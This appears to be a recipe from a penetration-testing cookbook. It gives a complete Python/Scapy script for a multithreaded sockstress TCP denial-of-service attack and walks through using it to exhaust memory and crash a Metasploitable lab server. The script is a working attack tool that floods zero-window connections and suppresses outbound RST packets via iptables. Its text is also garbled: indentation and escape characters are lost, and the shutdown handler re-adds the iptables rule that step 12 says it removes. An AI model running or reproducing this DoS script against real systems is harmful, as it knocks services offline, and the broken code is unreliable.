To perform a sock stress DoS attack, follow the given steps:

1. The following script was written in Scapy to perform a sock stress DoS attack against a target system. The following script can be used to test for vulnerable services:

        #!/usr/bin/python

        from scapy.all import *
        from time import sleep
        import thread
        import logging
        import os
        import signal
        import sys
        logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

        if len(sys.argv) != 4:
        print "Usage - ./sock_stress.py [Target-IP]
         [Port Number] [Threads]"
        print "Example - ./sock_stress.py 10.0.0.5 21 20"
        print "Example will perform a 20x multi-threaded
         sock-stress DoS attack "
        print "against the FTP (port 21) service on 10.0.0.5"
        print "n***NOTE***"

        print "Make sure you target a port that responds
         when a connection is made"
        sys.exit()

        target = str(sys.argv[1])
        dstport = int(sys.argv[2])
        threads = int(sys.argv[3])

        ## This is where the magic happens
        def sockstress(target,dstport):
        while 0 == 0:
        try:
        x = random.randint(0,65535)
        response = sr1(IP(dst=target)
        /TCP(sport=x,dport=dstport,flags='S'),timeout=1,verbose=0)             send(IP(dst=target)
        /TCP(dport=dstport,sport=x,window=0,flags='A',
        ack=(response[TCP].seq + 1))/'x00x00',verbose=0)
        except:
        pass

        ## Graceful shutdown allows IP Table Repair
        def graceful_shutdown(signal, frame):
        print 'nYou pressed Ctrl+C!'
        print 'Fixing IP Tables'
        os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d '
         + target + ' -j DROP')
        sys.exit()

        ## Creates IPTables Rule to Prevent Outbound RST Packet
         to Allow Scapy TCP Connections
        os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d '
         + target + ' -j DROP')
        signal.signal(signal.SIGINT, graceful_shutdown)

        ## Spin up multiple threads to launch the attack
        print "nThe onslaught has begun...use Ctrl+C to
         stop the attack"
        for x in range(0,threads):
        thread.start_new_thread(sockstress, (target,dstport))

        ## Make it go FOREVER (...or at least until Ctrl+C)
        while 0 == 0:
        sleep(1)

2. Notice that this script has two major functions: the sockstress attack function and a separate graceful shutdown function. A separate function is required for shutdown because in order for the script to function properly, the script has to modify the local IPtables rules. This change is necessary in order to complete TCP connections with a remote host using Scapy. The justification for this was more thoroughly addressed in the Connect scanning with Scapy recipe in Chapter 4, Port Scanning.
3. Prior to executing the script, we can use the netstat and free utilities to get a baseline for the connections established and memory being used:

4. By using netstat and then by piping the output over to a grep function and extracting only the established connections, we can see that only two connections exist. We can also use the free utility to see the current memory usage. The -m option will return the values in megabytes.
5. After determining the baseline for established connections and available memory, we can launch the attack on this target server:

6. When executing the script without any supplied arguments, the script will return the expected syntax and usage. The script accepts three arguments upon execution. These arguments include the target IP address, the port number that the sock stress DoS will be sent to, and the number of threads or concurrent processes that will be used to execute the sock stress DoS.
7. Each thread starts by generating an integer value between 0 and 65,535. This range represents the total possible values that can be assigned to the source port. The portions of the TCP header that define the source and destination port addresses are both 16 bits in length. Each bit can retain a value of 1 or 0. As such, there are 2¹⁶, or 65,536, possible TCP port addresses. A single source port can only hold a single connection, so by generating unique source port addresses for each connection, we can drastically improve the performance of the attack.
8. Once the attack has been started, we can verify that it is working by checking the active connections that have been established on the target server:

9. A few moments after executing the script, we can see that the number of established connections has drastically increased. The output displayed here is truncated, and the list of connections was actually significantly longer than this. By consistently using the free utility, we can watch the available memory of the system progressively deplete. Once the memory free value has dropped to nearly nothing, the free buffer/cache space will begin to drop:

10. After all resources on the local system have been depleted, the system will finally crash. The amount of time required to complete this process will vary depending on the amount of local resources available. In the case of the demonstration provided here, which was performed on a Metasploitable VM with 512 MB of RAM, the attack took approximately 2 minutes to deplete all available local resources and crash the server.

11. After the server has crashed or whenever you wish to stop the DoS attack, you can press Ctrl + C:

12. The script is written to catch the termination signal transmitted as a result of pressing Ctrl + C, and it will repair the local iptables by removing the rule that was generated prior to killing the script's execution sequence.